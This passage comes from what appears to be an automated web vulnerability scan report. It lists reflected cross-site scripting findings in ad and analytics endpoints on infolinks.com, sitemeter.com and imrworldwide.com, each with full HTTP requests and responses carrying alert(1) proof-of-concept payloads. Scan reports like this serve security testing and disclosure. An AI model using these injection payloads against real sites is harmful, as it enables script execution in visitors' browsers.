20reserved%7Creproduction%20in%20whole%20or%20in%20part%20without%20permission%20is%20prohibited%7Cin%20partnership%20with%20tmz%7Ccom%7C&purl=http%3A%2F%2Fwww%2Etoofab%2Ecom%2F&by=f&ptitle=hollywood%20news%2Cred%20carpet%20fashion%20and%20celebrity%20hairstyles%20%7C%20toofab%2Ccom&pdesc=get%20the%20latest%20celebrity%20gossip%2Chollywood%20news%2Ccovering%20red%20carpet%20fashion%20and%20events%2Ccelebrity%20hairstyles%20and%20celebrity%20beauty%20buzz%20at%20toofab%21&crtw=0&pimgs=toofab%7Clove%20it%7Clive%20it%7Cthis%20week%27s%20hottest%20pics%7Cbabies%7Cboobs%20%26%20beyonce%21%7Ctoddlers%20%26%20tiaras%7Cstar%20goes%20wild%20on%20live%20tv%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Ctaylor%20lautner%20shows%20stubble%20at%7Cabduction%7Cpremiere%7Chot%20shots%7Cseptember%2016%7C2011%7Ctoday%27s%20celebrity%20birthdays%7Cwin%20a%20hex%20iphone%20wallet%21%7Cworst%20dressed%20stars%20of%20emmys%7Cpast%7Cbest%20dressed%20stars%20of%20emmys%7Cpast%7Cchmerkovskiy%20brothers%20face%2Doff%20for%20the%20first%20time%21%7Cdancing%20with%20the%20stars%7Cofficial%20cast%20shots%21%7Cavatar%7Csarah%20jessica%20parker%27s%20many%20premiere%20looks%7Cchristina%20hendricks%20steals%20sjp%27s%20spotlight%20at%20premiere%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7Cnew%7Ctwo%20and%20a%20half%20men%7Copener%7Cashton%7Csings%7Ctheme%21%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Cjustin%20bieber%27s%20surprising%20views%20on%20marriage%7Csnooki%20gets%20inked%7Csee%20her%20new%20tattoo%7Ctoofab&wsid=1 HTTP/1.1
Host: rt1901.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:04:48 GMT; Path=/
Set-Cookie: cnoi=104; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:04:48 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1901
Date: Sat, 17 Sep 2011 00:50:40 GMT
Connection: close

data=({rid:'7fbf5229-56c4-45d9-9756-4d0d190b02834c805<script>alert(1)</script>f2688bb913f8c893f',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'reproduction':{auth:{ssd:'RGnT_j-2GsEU07fxKul_1ca5_kHh2Ljziu4RBM0NBWgCajs60kpL5TPhQcl9iAw3RUDjwzN5UFyh5snXy78BQl4mARUtsYCLqXFQAHnstb7P8waKLR-AF
...[SNIP]...

4.168. http://rt1903.infolinks.com/action/doq.htm [rid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1903.infolinks.com
Path:   /action/doq.htm

Issue detail

The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload add3f<script>alert(1)</script>879c54c0d03 was submitted in the rid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /action/doq.htm?pcode=utf-8&r=1316239125575.1 HTTP/1.1
Host: rt1903.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 9173
Origin: http://www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=4

pdesc=%20justin%20timberlake%20wants%20to%20make%20it%20clear%2Cthe%20explicit%20picture%20on%20mila%20kunis%2Ccell%20phone%2Cshowing%20a%20penis%2Cis%20not%20j%2Ct%2Cthis%20according%20to%20a%E2%80%A
...[SNIP]...
7Ctoo%20fab%21%7Chot%20photo%20galleries%7Cstories%20around%20the%20web%7Caround%20the%20web%7Csee%20more%7Calso%20on%20tmz%7Cfrom%20around%20the%20web&rid=52e80464%2D4fd8%2D49bb%2D8883%2Db8102d9272e9add3f<script>alert(1)</script>879c54c0d03&pimgs=justin%20timberlake%7Cnot%20my%20penis%21%7Cron%20artest%7Cname%20change%20official%7Csay%20hello%20to%20world%20peace%7Cmichaele%20salahi%7Cwild%20sex%7Cclaims%20with%20journey%20guitarist%7Cn
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00f111c; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:15:59 GMT; Path=/
Set-Cookie: cnoi=210; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:15:59 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1868
Date: Sat, 17 Sep 2011 01:01:51 GMT
Connection: close

data=({rid:'52e80464-4fd8-49bb-8883-b8102d9272e9add3f<script>alert(1)</script>879c54c0d03',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00f111c',sentences:{'cell phone':{auth:{ssd:'bXH9zo0oP2trfr38X0Ryk3U5x5miAWOAyTzsZMHmF-MuW5dSRTA2QpEXdPir-nXltEzXvjZPp3XaeebZhwovDhZzM4Y3hCYfApToKXiIf3UOxK5
...[SNIP]...

4.169. http://s19.sitemeter.com/js/counter.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s19.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdb83'%3balert(1)//824c0ca9399 was submitted in the site parameter. This input was echoed as fdb83';alert(1)//824c0ca9399 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.asp?site=s19actvaluefdb83'%3balert(1)//824c0ca9399 HTTP/1.1
Host: s19.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.actvalue.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 16 Sep 2011 19:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7318
Content-Type: application/x-javascript
Expires: Fri, 16 Sep 2011 19:55:37 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s19actvaluefdb83';alert(1)//824c0ca9399', 's19.sitemeter.com', '');

var g_sLastCodeName = 's19actvaluefdb83';alert(1)//824c0ca9399';
// ]]>
...[SNIP]...

4.170. http://s19.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s19.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b253b'%3balert(1)//171a4489a97 was submitted in the site parameter. This input was echoed as b253b';alert(1)//171a4489a97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=s19actvalueb253b'%3balert(1)//171a4489a97 HTTP/1.1
Host: s19.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.actvalue.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 16 Sep 2011 19:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7318
Content-Type: application/x-javascript
Expires: Fri, 16 Sep 2011 19:55:37 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s19actvalueb253b';alert(1)//171a4489a97', 's19.sitemeter.com', '');

var g_sLastCodeName = 's19actvalueb253b';alert(1)//171a4489a97';
// ]]>
...[SNIP]...

4.171. http://secure-us.imrworldwide.com/cgi-bin/m [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b3d7"-alert(1)-"fab51a82d9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m4b3d7"-alert(1)-"fab51a82d9e?ci=ENT20680&am=1&mr=1&ty=js&ep=1&at=view&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:01:58 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 754

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m4b3d7"-alert(1)-"fab51a82d9e?ci=ENT20680&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679&si=", pub.split('/')[2] ]; var ifrm = document.createElement("IFRAME");ifrm.onerror = ifrm.onlo
...[SNIP]...

4.172. http://secure-us.imrworldwide.com/cgi-bin/m [at parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the at request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46efd"-alert(1)-"f6f975e9889 was submitted in the at parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=js&ep=1&at=view46efd"-alert(1)-"f6f975e9889&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:01:32 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 754

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=fm&ep=1&at=view46efd"-alert(1)-"f6f975e9889&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679&si=", pub.split('/')[2] ]; var ifrm = document.createElement("IFRAME");ifrm.onerror = ifrm.onload = function () {ifrm.onerror = ifrm.onl
...[SNIP]...

4.173. http://secure-us.imrworldwide.com/cgi-bin/m [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the ci request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca67e"-alert(1)-"c113eb987a1 was submitted in the ci parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT20680ca67e"-alert(1)-"c113eb987a1&am=1&mr=1&ty=js&ep=1&at=view&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:01:22 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 754

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT20680ca67e"-alert(1)-"c113eb987a1&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679&si=", pub.split('/')[2] ]; var ifrm = document.createElement("IFRAME");ifrm.onerror = ifrm.onload = functio
...[SNIP]...

4.174. http://secure-us.imrworldwide.com/cgi-bin/m [cr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the cr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a47a4"-alert(1)-"067d6ddb51f was submitted in the cr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=js&ep=1&at=view&rt=banner&st=image&ca=5750480&cr=43918246a47a4"-alert(1)-"067d6ddb51f&pc=69485624&r=6620679 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:01:42 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 754

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=image&ca=5750480&cr=43918246a47a4"-alert(1)-"067d6ddb51f&pc=69485624&r=6620679&si=", pub.split('/')[2] ]; var ifrm = document.createElement("IFRAME");ifrm.onerror = ifrm.onload = function () {ifrm.onerror = ifrm.onload = null;};ifrm.setAttribute("frameborde
...[SNIP]...

4.175. http://secure-us.imrworldwide.com/cgi-bin/m [ep parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the ep request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85b8d"-alert(1)-"165bf79da56 was submitted in the ep parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=js&ep=185b8d"-alert(1)-"165bf79da56&at=view&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:01:30 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 754

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=fm&ep=185b8d"-alert(1)-"165bf79da56&at=view&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679&si=", pub.split('/')[2] ]; var ifrm = document.createElement("IFRAME");ifrm.onerror = ifrm.onload = function () {ifrm.onerror =
...[SNIP]...

4.176. http://secure-us.imrworldwide.com/cgi-bin/m [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4649"-alert(1)-"0cf4e6a941d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=js&ep=1&at=view&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679&b4649"-alert(1)-"0cf4e6a941d=1 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:01:52 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 757

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679&b4649"-alert(1)-"0cf4e6a941d=1&si=", pub.split('/')[2] ]; var ifrm = document.createElement("IFRAME");ifrm.onerror = ifrm.onload = function () {ifrm.onerror = ifrm.onload = null;};ifrm.setAttribute("frameborder","0");ifrm.setAttr
...[SNIP]...

4.177. http://secure-us.imrworldwide.com/cgi-bin/m [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 171b1"-alert(1)-"28e288e047b was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=js&ep=1&at=view&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679171b1"-alert(1)-"28e288e047b HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:01:46 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 754

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679171b1"-alert(1)-"28e288e047b&si=", pub.split('/')[2] ]; var ifrm = document.createElement("IFRAME");ifrm.onerror = ifrm.onload = function () {ifrm.onerror = ifrm.onload = null;};ifrm.setAttribute("frameborder","0");ifrm.setAttrib
...[SNIP]...

4.178. http://secure-us.imrworldwide.com/cgi-bin/m [rt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the rt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c006"-alert(1)-"dd298267831 was submitted in the rt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=js&ep=1&at=view&rt=banner3c006"-alert(1)-"dd298267831&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:01:35 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
